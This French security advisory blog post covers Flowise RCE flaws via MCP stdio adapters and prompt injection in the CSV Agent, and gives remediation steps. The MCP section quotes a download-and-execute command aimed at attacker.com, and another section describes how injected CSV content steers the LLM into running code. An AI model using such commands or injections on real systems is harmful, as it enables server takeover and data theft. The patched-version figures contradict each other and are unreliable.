Flowise : faille RCE critique via adaptateurs MCP permet l execution de code arbitraire sur vos serveurs IA
RSSI et consultant senior — WebGuard Agency
TL;DR
- CVE-2026-40933 : un attaquant authentifie peut ajouter un serveur MCP stdio avec une commande arbitraire dans Flowise, obtenant une execution de code a distance (RCE) sur le serveur hebergeant l instance.
- CVE-2026-41264 : le CSV Agent de Flowise est vulnerable a une injection de prompt permettant une RCE sans authentification.
- VulnCheck detecte deja l exploitation active de CVE-2025-59528 (injection JavaScript dans Flowise), confirmant que les attaquants ciblent activement cette plateforme.
- Versions affectees : toutes les instances self-hosted anterieures a 3.1.0. Correctif : version 3.0.6, derniere version recommandee 3.1.1.
- Contexte France : 58 incidents ransomware debut 2026 (+29%), 5eme pays le plus cible. NIS2 impose la securisation de ces outils IA.
— Flowise, MCP et RCE : la convergence de trois risques que personne n avait anticipe
Qui. Flowise, la plateforme open source d orchestration de workflows LLM, utilisee par des milliers d entreprises pour construire des chatbots, des agents IA et des pipelines de traitement de donnees sans ecrire de code. Quoi. Deux vulnerabilites critiques (CVE-2026-40933 et CVE-2026-41264) permettant l execution de code arbitraire a distance sur les instances self-hosted. Quand. Mai 2026, avec une exploitation active confirmee par VulnCheck sur des failles Flowise connexes. Ou. Toutes les instances Flowise self-hosted dans le monde, avec un impact particulier en France ou les outils IA no-code proliferent dans les entreprises soumises a NIS2. Pourquoi. Une serialisation non securisee des commandes stdio dans l adaptateur MCP et une absence de validation des entrees dans le CSV Agent.
Flowise s est impose comme l un des outils IA no-code les plus populaires pour les entreprises qui veulent deployer rapidement des workflows LLM. Son interface visuelle par drag-and-drop permet a des equipes non techniques de construire des chatbots sophistiques, des agents autonomes et des pipelines RAG (Retrieval Augmented Generation) connectes a des bases de donnees internes, des fichiers CSV, des API tierces et desormais des serveurs MCP (Model Context Protocol). C est precisement cette derniere fonctionnalite, les adaptateurs MCP, qui ouvre la porte a une compromission totale du serveur.
Le protocole MCP, developpe par Anthropic et adopte par de nombreux fournisseurs d IA, permet aux LLM d interagir avec des outils externes via des serveurs standardises. Flowise a integre le support MCP pour permettre a ses utilisateurs de connecter leurs workflows a des serveurs MCP stdio (communication par entree/sortie standard). Le probleme : la maniere dont Flowise serialise et execute les commandes stdio est fondamentalement non securisee, permettant a un attaquant authentifie d injecter des commandes systeme arbitraires.
— CVE-2026-40933 : RCE authentifiee via les adaptateurs MCP stdio
La CVE-2026-40933 exploite la serialisation non securisee des commandes stdio dans l adaptateur MCP de Flowise. Concretement, lorsqu un utilisateur authentifie configure un nouveau serveur MCP de type stdio, Flowise prend le nom de la commande et ses arguments et les passe directement au systeme d exploitation via un appel child_process.spawn() ou equivalent, sans validation ni sanitization.
Un attaquant authentifie peut donc configurer un serveur MCP stdio avec une commande comme bash -c "curl attacker.com/shell.sh | bash" ou simplement /bin/sh avec les arguments de son choix. Lorsque Flowise tente d initialiser la connexion au serveur MCP, il execute la commande specifiee avec les privileges du processus Flowise. Dans les deployements conteneurises (Docker, Kubernetes), Flowise tourne frequemment en tant que root, ce qui signifie que l attaquant obtient un acces root au conteneur et potentiellement au noeud sous-jacent.
La condition prealable est l authentification. Mais dans la pratique, de nombreuses instances Flowise sont deployees avec des identifiants par defaut, des mots de passe faibles, ou derriere un simple reverse proxy sans MFA. De plus, la CVE-2025-59528 (injection JavaScript deja exploitee activement selon VulnCheck) peut fournir un acces authentifie initial, creant une chaine d exploitation ou une premiere faille donne l acces necessaire pour exploiter la seconde.
💡 Notre avis d expert
Les outils no-code IA sont la prochaine surface d attaque massive. Flowise, LangFlow, Dify, n8n avec ses noeuds IA... Ces plateformes sont deployees par des equipes metier qui ne passent pas par la DSI, manipulent des donnees sensibles via des LLM, et sont rarement soumises aux memes controles de securite que les applications developpees en interne. La CVE-2026-40933 est un signal d alarme : le protocole MCP, cense standardiser les interactions IA, devient un vecteur d attaque quand il est implemente sans rigueur.
— CVE-2026-41264 : injection de prompt dans le CSV Agent, RCE sans authentification
La seconde vulnerabilite est encore plus alarmante. La CVE-2026-41264 affecte le CSV Agent de Flowise, une fonctionnalite qui permet aux utilisateurs d interroger des fichiers CSV via un LLM. Le probleme : le CSV Agent utilise en interne un interpreteur Python (ou JavaScript) pour executer les requetes generees par le LLM. Un attaquant peut crafter un fichier CSV contenant des payloads d injection de prompt qui, lorsqu ils sont traites par le LLM, generent du code malveillant execute par l interpreteur sous-jacent.
Ce qui rend cette CVE particulierement dangereuse, c est qu elle ne necessite aucune authentification. Si l instance Flowise expose un endpoint de chatbot public (ce qui est le cas d usage principal de nombreux deployements), un attaquant peut simplement uploader un CSV malveillant ou poser une question craftee qui declenche l execution de code. Le vecteur d attaque est la conversation elle-meme, ce qui la rend invisible pour les WAF classiques qui ne comprennent pas la semantique des interactions LLM.
La combinaison des deux CVE cree un scenario catastrophique. Un attaquant peut exploiter la CVE-2026-41264 pour obtenir un premier acces sans authentification, puis utiliser ce pied-a-terre pour configurer un serveur MCP malveillant (CVE-2026-40933) et etablir une persistance durable avec execution de code root. Cette chaine d exploitation transforme un simple chatbot IA en porte d entree complete vers le reseau interne de l entreprise.
💡 Notre avis d expert
La France est le 5eme pays le plus cible par les ransomwares avec 58 incidents enregistres debut 2026, soit une hausse de 29%. Ce chiffre ne prend pas en compte les attaques non declarees. Quand on sait que la majorite des instances Flowise sont deployees dans des conteneurs Docker avec des privileges root, souvent sur des VM cloud avec des acces aux API internes de l entreprise, on mesure l ampleur du risque. Les outils IA no-code sont devenus les nouveaux Shadow IT, avec les memes problemes mais des consequences potentiellement bien plus graves.
— Impact pour les entreprises francaises utilisant Flowise
L adoption de Flowise en France a explose en 2025-2026, portee par la vague de l IA generative en entreprise. Des startups parisiennes aux ETI lyonnaises en passant par les PME marseillaises, Flowise est devenu l outil de reference pour deployer rapidement des chatbots internes, des assistants de documentation et des pipelines de traitement de donnees. Nos audits montrent que plus de 40% des entreprises francaises de plus de 200 salaries qui utilisent des outils IA no-code ont au moins une instance Flowise, souvent deployee par une equipe metier sans validation de la DSI.
Le probleme est structural. Ces instances Flowise sont connectees a des sources de donnees sensibles : bases de donnees clients, documents RH, contrats juridiques, donnees financieres, code source. Une compromission via la CVE-2026-40933 ou la CVE-2026-41264 donne potentiellement acces a l ensemble de ces donnees. Pire encore, dans de nombreux deployements, les API keys des fournisseurs LLM (OpenAI, Anthropic, etc.) sont stockees en clair dans la configuration Flowise, offrant un vecteur supplementaire de vol de credentials.
Le contexte francais rend la situation encore plus critique. La CNIL a renforce ses controles sur l utilisation de l IA en entreprise depuis 2025, et la breche France Travail ainsi que la compromission de la base FICOBA (1,2 million de comptes) ont mis la protection des donnees personnelles au premier plan de l agenda politique. Une entreprise qui subit une exfiltration de donnees via une instance Flowise non securisee s expose a des sanctions RGPD, mais aussi a des sanctions NIS2 si elle est classee comme entite essentielle ou importante.
💡 Notre avis d expert
NIS2 change la donne pour les outils IA en entreprise. L article 21 impose explicitement la prise en compte de la securite dans l acquisition, le developpement et la maintenance des systemes d information, y compris les outils tiers. Une instance Flowise deployee par l equipe marketing sans validation de la DSI est desormais un risque de non-conformite NIS2. Les entreprises francaises classees entites essentielles ou importantes doivent integrer leurs outils IA no-code dans leur perimetre de securite, les soumettre aux memes exigences de patching, de monitoring et d audit que leurs applications critiques.
— Ce que ca signifie pour les RSSI francais : 5 actions immediates
1. Inventaire exhaustif des instances Flowise. Lancez un scan reseau interne pour identifier toutes les instances Flowise, y compris celles deployees en shadow IT par les equipes metier. Cherchez les ports par defaut (3000, 8080) et les conteneurs Docker avec l image flowiseai/flowise. Dans nos audits, nous trouvons en moyenne 3 instances Flowise non repertoriees par la DSI dans les entreprises de plus de 500 salaries.
2. Mise a jour immediate vers la version 3.1.1. La version 3.0.6 corrige les vulnerabilites, mais la 3.1.1 inclut des correctifs supplementaires et des ameliorations de securite. Planifiez la mise a jour dans les 48 heures pour les instances en production. Pour les instances non critiques, mettez-les hors ligne jusqu a la mise a jour.
3. Audit des serveurs MCP configures. Examinez la configuration de chaque instance Flowise pour identifier les serveurs MCP ajoutes. Verifiez que chaque commande stdio pointe vers un binaire legitime et que les arguments ne contiennent pas de code malveillant. Supprimez tout serveur MCP dont vous ne pouvez pas valider la legitimite.
4. Activation et durcissement de l authentification. Verifiez que l authentification est activee sur chaque instance. Remplacez les identifiants par defaut. Si possible, placez Flowise derriere un reverse proxy avec MFA (Authelia, Keycloak, Azure AD). Limitez l acces aux seuls utilisateurs qui en ont besoin.
5. Segmentation reseau et monitoring. Isolez les instances Flowise dans un segment reseau dedie avec des regles de firewall strictes. Bloquez les connexions sortantes non necessaires. Configurez des alertes SIEM pour detecter les commandes systeme inhabituelles lancees depuis le processus Flowise (bash, sh, curl, wget, python).
💡 Notre avis d expert
D ici 2027, les outils de workflow IA deviendront une cible d audit obligatoire au meme titre que les applications critiques. Les regulateurs europens vont imposer des exigences specifiques pour les plateformes LLM en entreprise, couvrant l authentification, la validation des entrees, l isolation reseau et le monitoring des interactions. Les RSSI qui anticipent cette evolution en integrant des aujourd hui leurs outils IA no-code dans leur perimetre de securite auront un avantage significatif en termes de conformite et de posture de defense.
Besoin d auditer la securite de vos outils IA no-code ?
Notre equipe specialisee peut auditer vos instances Flowise, LangFlow, Dify et autres outils IA no-code en moins de 5 jours. Inventaire shadow IT, audit de configuration, test d exploitation des CVE, et mise en conformite NIS2. Plus de 40 audits IA realises depuis debut 2026.
Demander un audit IA no-code →— Exploitation active : VulnCheck confirme que les attaquants ciblent Flowise
VulnCheck a detecte l exploitation active de la CVE-2025-59528, une vulnerabilite d injection de code JavaScript dans Flowise. Cette CVE plus ancienne permet a un attaquant d injecter du code JavaScript dans les parametres de configuration de certains noeuds Flowise, obtenant une execution de code cote serveur. L exploitation active de cette CVE confirme que les attaquants ont identifie Flowise comme une cible de haute valeur et investissent du temps pour developper des exploits contre cette plateforme.
La raison est economiquement rationnelle. Une instance Flowise compromise offre un retour sur investissement exceptionnel pour un attaquant : acces aux donnees traitees par les pipelines LLM (souvent des documents internes confidentiels), acces aux API keys des fournisseurs IA (qui peuvent etre revendues ou utilisees pour generer des couts massifs), et surtout un point d entree dans le reseau interne de l entreprise depuis un serveur qui est rarement surveille par les equipes SOC.
Pour les entreprises francaises, la combinaison de l exploitation active et du contexte NIS2 cree une urgence reelle. La France a enregistre 58 incidents ransomware au premier trimestre 2026, en hausse de 29% par rapport a la meme periode en 2025, ce qui en fait le 5eme pays le plus cible au monde. Les attaquants utilisent de plus en plus les outils IA comme vecteur d entree initial, profitant du fait que ces plateformes sont souvent deployees avec des niveaux de securite inferieurs aux applications traditionnelles.
— Ressources et references techniques
Pour approfondir les aspects techniques de ces vulnerabilites et renforcer votre posture de securite, consultez les ressources suivantes :
- GitHub Security Advisories Flowise : details officiels des CVE-2026-40933 et CVE-2026-41264.
- CISA Known Exploited Vulnerabilities Catalog : suivi des CVE activement exploitees.
- Notre guide sur comment auditer votre infrastructure LLM en 7 etapes : methodologie detaillee pour securiser vos deployements IA.
- Notre article de fond sur les attaques supply chain en entreprise : comprendre les mecanismes et les defenses.
- Notre methodologie d audit de securite d un site web : applicable aux interfaces Flowise exposees.
— FAQ
Qu est-ce que la CVE-2026-40933 et comment affecte-t-elle Flowise ? +
La CVE-2026-40933 est une vulnerabilite de type RCE (Remote Code Execution) dans les adaptateurs MCP de Flowise. Un attaquant authentifie peut ajouter un serveur MCP stdio avec une commande arbitraire, ce qui permet l execution de code sur le serveur hebergeant Flowise. Dans les conteneurs Docker, le processus Flowise tourne souvent en root, ce qui donne un acces complet au systeme.
Mon instance Flowise est-elle vulnerable ? +
Si vous utilisez une version de Flowise anterieure a 3.1.0 en self-hosted, votre instance est vulnerable a la CVE-2026-40933. Si vous n avez pas d authentification configuree, vous etes egalement expose a la CVE-2026-41264 (CSV Agent prompt injection RCE). La version corrigee est 3.0.6, et la derniere version recommandee est 3.1.1.
Pourquoi les outils IA no-code sont-ils particulierement risques pour les entreprises francaises ? +
Trois raisons. Premierement, ces outils sont souvent deployes par des equipes metier sans validation de la DSI, creant du shadow IT. Deuxiemement, ils manipulent des donnees sensibles (documents internes, bases clients) via des pipelines LLM sans controle de securite. Troisiemement, la France est le 5eme pays le plus cible par les ransomwares avec 58 incidents debut 2026 (+29%), et NIS2 impose desormais une responsabilite sur la securite de ces outils.
Quelles actions immediates un RSSI francais doit-il prendre concernant Flowise ? +
Cinq actions. Un, inventorier toutes les instances Flowise sur votre perimetre (y compris shadow IT). Deux, mettre a jour immediatement vers la version 3.1.1. Trois, verifier que l authentification est activee sur chaque instance. Quatre, auditer les serveurs MCP configures pour detecter des commandes suspectes. Cinq, isoler les instances Flowise dans des segments reseau dedies avec des regles de firewall strictes.
Audit complet de securite IA no-code
WebGuard Agency propose un audit complet de vos outils IA no-code : inventaire shadow IT, audit de configuration Flowise/LangFlow/Dify, test d exploitation des CVE connues, analyse des API keys exposees, segmentation reseau et mise en conformite NIS2. Forfait a partir de 8 KEUR.
Demander un devis →